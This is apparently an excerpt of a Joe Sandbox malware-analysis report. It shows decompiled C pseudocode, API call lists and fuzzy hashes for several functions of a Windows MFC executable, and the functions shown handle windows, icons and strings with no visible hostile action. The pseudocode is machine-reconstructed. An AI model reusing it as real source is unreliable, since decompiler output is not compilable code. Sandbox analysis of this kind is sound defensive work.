Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2614#3797#3874#535#6358#800#858H_prolog
String ID:
API String ID: 2707472638-0
Opcode ID: b4c699001687a8589c8a22b99ecbf2f9b95626e0a4572c3f5719b2340c5e7583
Instruction ID: 13117b9e82df80cf6bfa14f42e6dc11a1bfac93f37c5c75042c6cc5f2cee2129
Opcode Fuzzy Hash: b4c699001687a8589c8a22b99ecbf2f9b95626e0a4572c3f5719b2340c5e7583
Instruction Fuzzy Hash: BB01A531A006119FDB24EBA6C881AAFB3A9AF59318F04453FA112661D1CFB86D05CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3EA, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040A3EA(void* __ecx) {
				void* _t22;
				void* _t23;
				signed int _t36;
				void* _t41;
				void* _t43;

				E0043E4E0(0x43fa13, _t43);
				 *(_t43 - 0x10) =  *(_t43 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t43 + 0xc)));
				_push(_t43 + 0xc);
				_t22 = E0040FEA7();
				_t36 = 1;
				_push(":");
				 *(_t43 - 4) = _t36;
				L0043DFD6();
				_t41 = _t22 + 2;
				_t8 = _t41 + 0x453690; // 0x453692
				_t23 = _t8;
				_push(_t23);
				L0043DFD6();
				if(_t41 == 0xffffffff || _t23 == 0xffffffff) {
					_push(0x4550cc);
					L0043DE26();
					 *(_t43 - 0x10) = _t36;
				} else {
					_push(_t23 - _t41);
					_push(_t41);
					_push( *((intOrPtr*)(_t43 + 8)));
					L0043DFBE();
					 *(_t43 - 0x10) = _t36;
				}
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return  *((intOrPtr*)(_t43 + 8));
			}

0x0040a3ef
0x0040a3f5
0x0040a3fe
0x0040a401
0x0040a402
0x0040a40e
0x0040a40f
0x0040a414
0x0040a417
0x0040a422
0x0040a423
0x0040a423
0x0040a429
0x0040a42a
0x0040a432
0x0040a450
0x0040a455
0x0040a45a
0x0040a439
0x0040a43e
0x0040a43f
0x0040a440
0x0040a443
0x0040a448
0x0040a448
0x0040a45d
0x0040a464
0x0040a471
0x0040a479

APIs

__EH_prolog.LIBCMT ref: 0040A3EF

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(00453524), ref: 0040A417
#2764.MFC42(00453692,00453524), ref: 0040A42A
#4278.MFC42(?,00000002,00000000,00453692,00453524), ref: 0040A443
#537.MFC42(004550CC,00453692,00453524), ref: 0040A455
#800.MFC42(004550CC,00453692,00453524), ref: 0040A464

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2764#537#800H_prologMessageSend$#4278#535#823#825Windowmemset
String ID:
API String ID: 3542688000-0
Opcode ID: f36e357d4f3614a44cf6555e482caa933f04e34653b2297cefe51644dfad52b6
Instruction ID: 91a84fb2c9ff9de2bcfe13fc5ea119ce7d405c0b88de35c77df034f8feff6967
Opcode Fuzzy Hash: f36e357d4f3614a44cf6555e482caa933f04e34653b2297cefe51644dfad52b6
Instruction Fuzzy Hash: 0011E536800108EBCB24EF54E845AEE7764EF44338F10822FF836961C1D7789705C795

Uniqueness

Uniqueness Score: -1.00%

Function 00428FAA, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428FAA(struct tagRECT* _a4) {
				int _t6;
				signed int _t7;
				signed int _t8;
				long _t9;
				long _t10;
				int _t17;
				struct tagRECT* _t21;
				int _t22;

				_t17 = GetSystemMetrics(0);
				_t6 = GetSystemMetrics(1);
				_t21 = _a4;
				_t22 = _t6;
				_t7 = _t21->left;
				if(_t7 < 0) {
					OffsetRect(_t21,  ~_t7, 0);
				}
				_t8 = _t21->top;
				if(_t8 < 0) {
					OffsetRect(_t21, 0,  ~_t8);
				}
				_t9 = _t21->right;
				if(_t9 > _t17) {
					OffsetRect(_t21, _t17 - _t9, 0);
				}
				_t10 = _t21->bottom;
				if(_t10 > _t22) {
					return OffsetRect(_t21, 0, _t22 - _t10);
				}
				return _t10;
			}

0x00428fba
0x00428fbc
0x00428fbe
0x00428fc8
0x00428fca
0x00428fce
0x00428fd6
0x00428fd6
0x00428fd8
0x00428fdd
0x00428fe5
0x00428fe5
0x00428fe7
0x00428fec
0x00428ff4
0x00428ff4
0x00428ff6
0x00428ffb
0x00000000
0x00429003
0x00429009

APIs

GetSystemMetrics.USER32 ref: 00428FB6
GetSystemMetrics.USER32 ref: 00428FBC
OffsetRect.USER32(?,00000000,00000000), ref: 00428FD6
OffsetRect.USER32(?,00000000,?), ref: 00428FE5
OffsetRect.USER32(?,00000000,00000000), ref: 00428FF4
OffsetRect.USER32(?,00000000,00000000), ref: 00429003

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: OffsetRect$MetricsSystem
String ID:
API String ID: 3740680172-0
Opcode ID: ef46aa798c0639a7aa47ac2d1b53c38a8e6631be31c0cef314ee719047698104
Instruction ID: 2a4e5cf9f6249bf9d097ff1f418033674d9854aaea719df39bfe471cd5fddcc9
Opcode Fuzzy Hash: ef46aa798c0639a7aa47ac2d1b53c38a8e6631be31c0cef314ee719047698104
Instruction Fuzzy Hash: 24F04F713427296BE220AA6AAD41F7BB7DCDF82754F52042AFA04D3681D694BC014AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419C1A, Relevance: 9.0, APIs: 6, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00419C1A(void* __eflags) {
				void* __esi;
				void* _t21;
				void* _t27;
				void* _t28;
				void* _t39;
				CHAR* _t41;
				void* _t43;

				E0043E4E0(0x4411db, _t43);
				_push(_t39);
				_t21 = E00419DC7(_t43 - 0x1f0, 0);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t41 = L004044C9(_t21, _t43 - 0x1f0, _t39) + 0x1dcc;
				_push(_t41);
				L0043DDD2();
				_t27 = E00429029(_t43 - 0x10, (0 |  *_t41 != 0x00000000) + 0xe065);
				_push(_t27);
				 *(_t43 - 4) = 1;
				L0043DFCA();
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				L0043DD36();
				L0043DE7A();
				if(_t27 == 1) {
					lstrcpynA(_t41,  *(_t43 - 0x118), 0x40);
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				_t28 = L0040663D(_t43 - 0x1f0,  *(_t43 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t28;
			}

0x00419c1f
0x00419c2a
0x00419c33
0x00419c38
0x00419c49
0x00419c4f
0x00419c50
0x00419c66
0x00419c6d
0x00419c74
0x00419c78
0x00419c7d
0x00419c84
0x00419c8f
0x00419c97
0x00419ca2
0x00419ca2
0x00419ca8
0x00419cb2
0x00419cbb
0x00419cc3

APIs

__EH_prolog.LIBCMT ref: 00419C1F

Part of subcall function 00419DC7: __EH_prolog.LIBCMT ref: 00419DCC
Part of subcall function 00419DC7: #324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
Part of subcall function 00419DC7: #860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91

#860.MFC42(-00001DCC), ref: 00419C50

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#858.MFC42(00000000,-00001DCC), ref: 00419C78
#800.MFC42(00000000,-00001DCC), ref: 00419C84
#2514.MFC42(00000000,-00001DCC), ref: 00419C8F
lstrcpynA.KERNEL32(-00001DCC,?,00000040,00000000,-00001DCC), ref: 00419CA2

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#860$H_prolog$#1168#2514#324#537#800#858LoadStringlstrcpyn
String ID:
API String ID: 2272019338-0
Opcode ID: 219e58d94362c9aed8c7965cc90d398478aab8b3fda095f3469ebcd3aebdea7e
Instruction ID: ead75609374426ae95b89c69f6991408ac464c185c742c3dcb5e4f35b0cbccf1
Opcode Fuzzy Hash: 219e58d94362c9aed8c7965cc90d398478aab8b3fda095f3469ebcd3aebdea7e
Instruction Fuzzy Hash: 40116171C10165DADB25E761DC16BDD7774AF15318F0045AEE11AB20C2DF781F44CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004283A6, Relevance: 9.0, APIs: 6, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004283A6(void* __ecx, char* _a4) {
				signed int _t23;
				char* _t25;
				void* _t29;
				signed int _t30;
				void* _t42;
				void* _t44;
				void* _t45;

				_t44 = __ecx;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 1;
				_t23 =  *(__ecx + 0xc);
				if( *((intOrPtr*)(__ecx + 8)) >= _t23) {
					_t29 = _t23 +  *((intOrPtr*)(__ecx + 0x10)) << 2;
					_push(_t29);
					L0043DD54();
					_t42 = _t29;
					_t30 =  *(__ecx + 0xc);
					if(_t30 != 0) {
						memcpy(_t42,  *(__ecx + 4), _t30 << 2);
						_t45 = _t45 + 0xc;
					}
					_push( *(_t44 + 4));
					L0043DD42();
					 *((intOrPtr*)(_t44 + 0xc)) =  *((intOrPtr*)(_t44 + 0xc)) +  *((intOrPtr*)(_t44 + 0x10));
					 *(_t44 + 4) = _t42;
				}
				_t25 = strlen(_a4) + 1;
				_push(_t25);
				L0043DD54();
				 *( *(_t44 + 4) +  *(_t44 + 8) * 4) = _t25;
				return strcpy( *( *(_t44 + 4) +  *(_t44 + 8) * 4), _a4);
			}

0x004283a7
0x004283a9
0x004283af
0x004283b4
0x004283ba
0x004283bd
0x004283be
0x004283c3
0x004283c5
0x004283cb
0x004283d5
0x004283da
0x004283da
0x004283dd
0x004283e0
0x004283e9
0x004283ec
0x004283ef
0x004283f9
0x004283fa
0x004283fb
0x0042840a
0x0042841f

APIs

#823.MFC42(?,?,00000000,00428DAD,?), ref: 004283BE
memcpy.MSVCRT ref: 004283D5
#825.MFC42(?,?,00000000,00428DAD,?), ref: 004283E0
strlen.MSVCRT ref: 004283F4
#823.MFC42(00000001,00428DAD,00000000,00428DAD,?), ref: 004283FB
strcpy.MSVCRT(?,00428DAD,00000001,00428DAD,00000000,00428DAD,?), ref: 00428416

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823$#825memcpystrcpystrlen
String ID:
API String ID: 2118311648-0
Opcode ID: f3fc155ed8fa44a41e57438bee8cddc14b7eeb416edc99d220e26f0225f87f8b
Instruction ID: b2a9ed9ed880244802dbe9fad298d8991d9ce1444d8271da3989c9882859633d
Opcode Fuzzy Hash: f3fc155ed8fa44a41e57438bee8cddc14b7eeb416edc99d220e26f0225f87f8b
Instruction Fuzzy Hash: 9B010C76600B019FD720EF26D842D27B7F5EF98714750981EE4AAC3A61DB35F851CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0041F501, Relevance: 9.0, APIs: 6, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041F501(void* __ecx) {
				void* _t22;
				intOrPtr _t23;
				void* _t35;
				CHAR* _t38;
				void* _t40;

				E0043E4E0(0x441d6c, _t40);
				_t38 =  *(_t40 + 0x10);
				_t35 = LoadIconA( *(_t40 + 8), _t38);
				if(_t35 != 0) {
					L0043DDD8();
					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
					if((_t38 & 0xffff0000) != 0) {
						 *(_t40 - 0x10) =  *(_t40 - 0x10) & 0x00000000;
						_push(_t38);
						L0043DDD2();
					} else {
						 *(_t40 - 0x10) = _t38;
					}
					_t23 =  *0x4554a8; // 0x0
					E0041FBD1(0x4554a0, _t23, _t40 - 0x14);
					ImageList_ReplaceIcon( *( *((intOrPtr*)(_t40 + 0x14)) + 4), 0xffffffff, _t35);
					 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
					L0043DD36();
				}
				_t22 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				return _t22;
			}

0x0041f506
0x0041f50e
0x0041f51c
0x0041f520
0x0041f525
0x0041f52a
0x0041f534
0x0041f53b
0x0041f53f
0x0041f543
0x0041f536
0x0041f536
0x0041f536
0x0041f548
0x0041f557
0x0041f565
0x0041f56b
0x0041f572
0x0041f572
0x0041f57c
0x0041f57f
0x0041f587

APIs

__EH_prolog.LIBCMT ref: 0041F506
LoadIconA.USER32(?,?), ref: 0041F516
#540.MFC42 ref: 0041F525
#860.MFC42(?), ref: 0041F543
ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,00000000,00000000,?,?), ref: 0041F565
#800.MFC42 ref: 0041F572

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Icon$#540#800#860H_prologImageList_LoadReplace
String ID:
API String ID: 1685302977-0
Opcode ID: dd370175c44d3ece78625e21dd3379f24d9aa377f0141dff7367623b5ef0326a
Instruction ID: 76e46a4595ce0d6162af29971bf0a00212d8004dd12f16eb7edeffd32a9e23e5
Opcode Fuzzy Hash: dd370175c44d3ece78625e21dd3379f24d9aa377f0141dff7367623b5ef0326a
Instruction Fuzzy Hash: 8601CC72800109ABCB10DF84DD06BEE7775EF85325F10022AB412A22E1DB78AE46CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED20, Relevance: 9.0, APIs: 6, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040ED20(void* __ecx) {
				int _t5;
				void* _t13;

				_t13 = __ecx;
				_t5 = SendMessageA( *(__ecx + 0x248), 0x100c, 0xffffffff, 2);
				if(_t5 != 0xffffffff) {
					SendMessageA( *(_t13 + 0x248), 0x1008, _t5, 0);
					_t5 = SendMessageA( *(_t13 + 0x248), 0x1004, 0, 0);
					if(_t5 == 0) {
						_push(0x421);
						L0043DFA6();
						if(_t5 != 0) {
							_push(0x421);
							L0043E066();
							return SendMessageA( *(_t5 + 0x20), 0xf5, 0, 0);
						}
					}
				}
				return _t5;
			}

0x0040ed2c
0x0040ed3b
0x0040ed40
0x0040ed51
0x0040ed60
0x0040ed64
0x0040ed6d
0x0040ed6e
0x0040ed75
0x0040ed77
0x0040ed7a
0x00000000
0x0040ed89
0x0040ed75
0x0040ed64
0x0040ed8f

APIs

SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040ED3B
SendMessageA.USER32(?,00001008,00000000,00000000), ref: 0040ED51
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ED60
#4055.MFC42(00000421), ref: 0040ED6E
#3092.MFC42(00000421,00000421), ref: 0040ED7A
SendMessageA.USER32(?,000000F5,00000000,00000000), ref: 0040ED89

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSend$#3092#4055
String ID:
API String ID: 3366912665-0
Opcode ID: f9498fddd1601883ff9d032e10246302414b5e35ceda410694d2e9b484e2f198
Instruction ID: f078b3c12c30cf52bb7425468f7ac916964146173571abe3a85cd9422e39874b
Opcode Fuzzy Hash: f9498fddd1601883ff9d032e10246302414b5e35ceda410694d2e9b484e2f198
Instruction Fuzzy Hash: 37F02EB130061977E5313223CC09E6B3E0CDF867B9F02073AF628A51F0CDA26C125624

Uniqueness

Uniqueness Score: -1.00%

Function 0041F372, Relevance: 9.0, APIs: 6, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041F372(intOrPtr __eax, void* __ecx) {
				intOrPtr _t1;
				signed int _t8;

				_t1 = __eax;
				_push(0x47e);
				L0043DFA6();
				_push(0x421);
				 *0x4557c8 = __eax;
				L0043DFA6();
				_push(0x487);
				 *0x4557d8 = __eax;
				L0043DFA6();
				_t8 = 1;
				if(__eax == 0 ||  *0x4557d8 == 0) {
					 *0x4557d0 =  *0x4557d0 & 0x00000000;
				} else {
					 *0x4557d0 = _t8;
				}
				_push(0x488);
				L0043DFA6();
				if(_t1 == 0 ||  *0x4557d8 == 0) {
					 *0x4557d4 =  *0x4557d4 & 0x00000000;
				} else {
					 *0x4557d4 = _t8;
				}
				_push(0x422);
				L0043DFA6();
				 *0x4557cc = _t1;
				L0043E300();
				return _t1;
			}

0x0041f372
0x0041f376
0x0041f37b
0x0041f380
0x0041f387
0x0041f38c
0x0041f391
0x0041f398
0x0041f39d
0x0041f3a6
0x0041f3a7
0x0041f3ba
0x0041f3b2
0x0041f3b2
0x0041f3b2
0x0041f3c1
0x0041f3c8
0x0041f3cf
0x0041f3e2
0x0041f3da
0x0041f3da
0x0041f3da
0x0041f3e9
0x0041f3f0
0x0041f3f7
0x0041f3fc
0x0041f403

APIs

#4055.MFC42(0000047E), ref: 0041F37B
#4055.MFC42(00000421,0000047E), ref: 0041F38C
#4055.MFC42(00000487,00000421,0000047E), ref: 0041F39D
#4055.MFC42(00000488,00000487,00000421,0000047E), ref: 0041F3C8
#4055.MFC42(00000422,00000488,00000487,00000421,0000047E), ref: 0041F3F0
#5162.MFC42(00000422,00000488,00000487,00000421,0000047E), ref: 0041F3FC

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
